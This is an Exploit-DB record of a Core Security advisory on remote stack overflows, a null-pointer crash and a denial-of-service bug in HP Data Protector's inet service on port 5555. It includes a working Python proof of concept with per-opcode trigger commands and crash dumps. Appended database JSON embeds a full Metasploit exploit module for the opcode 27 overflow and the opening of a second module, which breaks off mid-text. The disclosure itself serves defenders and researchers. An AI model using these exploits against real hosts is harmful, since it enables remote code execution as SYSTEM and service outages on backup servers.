ID EDB-ID:17458 Type exploitdb Reporter Core Security Modified 2011-06-29T00:00:00
Description
HP Data Protector 6.20 - Multiple Vulnerabilities. CVE-2011-1865. Dos exploit for windows platform
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Multiple vulnerabilities in HP Data Protector
1. *Advisory Information*
Title: Multiple vulnerabilities in HP Data Protector
Advisory ID: CORE-2011-0514
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Remote stack overflow [CWE-120], Null pointer dereference
[CWE-476], Improper input validation [CWE-20]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515
3. *Vulnerability Description*
HP Data Protector [1] is an automated backup and recovery software for
single-server to enterprise environments. Multiple vulnerabilities have
been found in HP Data Protector that could allow a remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered by sending a request to port 5555 of a
host running the "data protector inet" service, part of HP Data
Protector. The request has several parameters, including an opcode. By
sending requests with specially crafted parameters, the different bugs
can be triggered.
4. *Vulnerable packages*
. HP OpenView Storage Data Protector v6.20 (running on Windows).
. HP OpenView Storage Data Protector v6.11 (running on Windows).
. HP OpenView Storage Data Protector v6.10 (running on Windows).
. HP OpenView Storage Data Protector v6.00 (running on Windows).
. Previous versions may be affected, but were not tested.
5. *Non-vulnerable packages*
. No fixes are available at the time of publication.
6. *Vendor Information, Solutions and Workarounds*
HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.
The latest version of HP Data Protector is vulnerable to these issues.
HP has provided the following procedure to mitigate these vulnerabilities:
1. Upgrade to Data Protector A.06.20 or subsequent.
2. Enable encrypted control communication services on cell server and
all clients in cell.
The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.
7. *Credits*
These vulnerabilities were discovered by Oren Isacson from Core Security
Technologies. Publication was coordinated by Carlos Sarraute.
8. *Technical Description / Proof of Concept Code*
The following python script can be used to reproduce the different bugs.
/-----
import struct, socket, sys
target = sys.argv[1]
opcode = sys.argv[2]
string_lenght = int(sys.argv[3])
args_number = int(sys.argv[4])
long_argument = int(sys.argv[5])
def to_wc(x):
return ''.join(["%s\x00" % c for c in x] )
args = [to_wc('a')] * args_number
args[5] = to_wc(opcode)
args[long_argument] = 'a' * string_lenght
packet = ["\xff\xfe\x32\x00\x00\x00"]
for s in args:
packet.append("\x20\x00" + s + "\x00\x00")
packet = ''.join(packet)
packet = struct.pack(">L", len(packet)) + packet
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, 5555))
sock.send(packet)
- -----/
In the following sections, we give the command line details to reproduce
each bug, and a brief description of the effect produced.
8.1. *Vulnerability 1. Opcodes 20 y 28.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"
This causes a stack overflow.
/-----
007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3
007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52
007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35
61616161 00000000 00000000 00000000 00000000 0x61616161
- -----/
8.2. *Vulnerability 2. Opcode 11.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 11 10000 30 17"
A stack overflow is produced within the function swprintf, called from
position 0x00411A72.
8.3. *Vulnerability 3. Opcode 35.*
[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
"poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"
A stack overflow is produced within the function swprintf, called from
position 0041367F.
8.4. *Vulnerability 4. Opcode 42.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 42 10000 30 9"
A stack overflow is produced by calling the function swprintf from
position 0x0040A9BA.
8.5. *Vulnerability 5. Opcode 46.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 46 10000 30 17"
A stack overflow is produced by calling the function swprintf from
position 0x0040A708.
8.6. *Vulnerability 6. Opcode 27.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 27 10000 30 3"
A stack overflow is produced by calling the function swprintf from
position 0x0040AD53.
8.7. *Vulnerabilidad 7. Opcode 17.*
[CVE-2011-1865] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 17 10000 30 6"
A stack overflow is produced by calling the function swprintf from
position 0x0040FC05.
8.8. *Vulnerability 8. Opcode 11.*
[CVE-2011-1514] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 11 1 7 6"
This causes a null pointer dereference.
/-----
eax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490
edi=00000000
eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac
pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010212
omniinet+0x7ed0:
00407ed0 8b10 mov edx,[eax]
ds:0023:00000014=????????
007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0
007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e
007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b
007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02
007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c
007cffb4 7c80b713 00156490 00000000 0012e7f8
ADVAPI32!CryptVerifySignatureW+0x29
007cffec 00000000 77df3519 00156490 00000000
kernel32!GetModuleFileNameA+0x1b4
- -----/
8.9. *Vulnerability 9. Opcode 20.*
[CVE-2011-1515] This vulnerability is reproduced with the following command:
"poc.py 127.0.0.1 20 1 7 6"
The process terminates without generating an exception, resulting in a
denial of service condition.
9. *Report Timeline*
. 2011-06-02:
Core Security Technologies notifies HP Security Alert team of the
vulnerabilities. Publication date is temporarily set to July 5th, 2011.
. 2011-06-06:
Vendor acknowledges receipt.
. 2011-06-06:
Core sends technical details to the vendor.
. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).
. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).
. 2011-06-23:
Core requests once more an update.
. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities, and recommends
as mitigation to enable encrypted communications in the cell server and
client.
. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.
. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.
. 2011-06-29:
Advisory CORE-2011-0514 is published.
10. *References*
[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo
CwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=
=ozGY
-----END PGP SIGNATURE-----
{"id": "EDB-ID:17458", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "description": "HP Data Protector 6.20 - Multiple Vulnerabilities. CVE-2011-1865. Dos exploit for windows platform", "published": "2011-06-29T00:00:00", "modified": "2011-06-29T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/17458/", "reporter": "Core Security", "references": [], "cvelist": ["CVE-2011-1865"], "lastseen": "2016-02-02T07:54:16", "viewCount": 4, "enchantments": {"score": {"value": 9.4, "vector": "NONE", "modified": "2016-02-02T07:54:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1865"]}, {"type": "saint", "idList": ["SAINT:58795E132074156A75A962B77A5E7B84", "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95"]}, {"type": "exploitdb", "idList": ["EDB-ID:17468", "EDB-ID:17490", "EDB-ID:17467"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102732", "PACKETSTORM:102673", "PACKETSTORM:102746"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11768", "SECURITYVULNS:DOC:26620", "SECURITYVULNS:DOC:26621"]}, {"type": "seebug", "idList": ["SSV:71823"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:357E2A5253FECAF999A26172A2781370"]}, {"type": "nessus", "idList": ["HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902454"]}], "modified": "2016-02-02T07:54:16", "rev": 2}, "vulnersScore": 9.4}, "sourceHref": "https://www.exploit-db.com/download/17458/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the \"data protector inet\" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join([\"%s\\x00\" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\r\n\r\nfor s in args:\r\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(\">L\", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 10000 30 17\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 42 10000 30 9\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 46 10000 30 17\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 27 10000 30 3\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 17 10000 30 6\"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 11 1 7 6\"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n \"poc.py 127.0.0.1 20 1 7 6\"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n. 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n. 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n. 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n. 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n. 2011-06-23:\r\nCore requests once more an update.\r\n\r\n. 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n. 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n. 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n. 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----\r\n", "osvdbidlist": ["73571"]}
{"cve": [{"lastseen": "2020-10-03T11:39:27", "description": "Multiple stack-based buffer overflows in the inet service in HP OpenView Storage Data Protector 6.00 through 6.20 allow remote attackers to execute arbitrary code via a request containing crafted parameters.", "edition": 3, "cvss3": {}, "published": "2011-07-01T10:55:00", "title": "CVE-2011-1865", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1865"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:hp:openview_storage_data_protector:6.11", "cpe:/a:hp:openview_storage_data_protector:6.10", "cpe:/a:hp:openview_storage_data_protector:6.20", "cpe:/a:hp:openview_storage_data_protector:6.00"], "id": "CVE-2011-1865", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1865", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_storage_data_protector:6.20:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.00:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_storage_data_protector:6.10:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:22:11", "description": "", "published": "2011-07-02T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "PACKETSTORM:102732", "href": "https://packetstormsecurity.com/files/102732/HP-OmniInet.exe-Opcode-27-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the Hewlett-Packard \nOmniInet NT Service. By sending a specially crafted opcode 27 packet, \na remote attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13081 $', \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243', \n{ \n#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll \n'Ret' => 0x7c35630d \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 29 2011')) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef check \n \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif (resp) \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \n# extract version \nif (resp =~ /HP Data Protector/) \nversion = resp.split[3] \nelsif (resp =~ /HP OpenView Storage Data Protector/) \nversion = resp.split[5] \nelsif (resp =~ /HP StorageWorks Application Recovery Manager/) \nversion = resp.split[5] \nelse \nreturn Exploit::CheckCode::Detected \nend \n \nversion = version.split('.') \nmajor = version[1].to_i \nminor = version[2].to_i \nif ((major < 6) or (major == 6 and minor < 11)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif ((major > 6) or (major == 6 and minor >= 11)) \nreturn Exploit::CheckCode::Safe \nend \n \nend \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ntrigger = rand_text_alpha_upper(10000) \ntrigger[4552, payload.encoded.length] = payload.encoded \ntrigger[5352, 8] = generate_seh_record(target.ret) \ntrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string \n \nopcode = \"27\" \n \npacket = Rex::Text.to_unicode(\"\\x00\") \npacket << \"\\x27\\xca\" #length \npacket << \"\\xff\\xfe\\x32\" \npacket << \"\\x00\\x00\\x00\" \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3 \npacket << Rex::Text.to_unicode(\"\\x20\") \npacket << trigger \npacket << Rex::Text.to_unicode(\"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \n \nprint_status(\"Trying #{target.name}...\") \nsock.put(packet) \n \nselect(nil,nil,nil,10) \nhandler \ndisconnect \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102732/hp_omniinet_3.rb.txt"}, {"lastseen": "2016-12-05T22:13:45", "description": "", "published": "2011-07-04T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "PACKETSTORM:102746", "href": "https://packetstormsecurity.com/files/102746/HP-OmniInet.exe-Opcode-20-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_4.rb 13092 2011-07-04 17:02:40Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a vulnerability found in HP Data Protector's OmniInet \nprocess. By supplying a long string of data as the file path with opcode '20', \na buffer overflow can occur when this data is being written on the stack where \nno proper bounds checking is done beforehand, which results arbitrary code \nexecution under the context of SYSTEM. This module is also made against systems \nsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR \nenabled by default. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 13092 $\", \n'Author' => \n[ \n'Oren Isacson', #Initial discovery, poc \n'muts', #Initial poc of the ROP exploit w/ dookie \n'dookie2000ca', #Initial poc of the ROP exploit w/ muts \n'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD) \n'corelanc0d3r', #MSF module with sinn3r \n], \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ], \n[ 'URL', 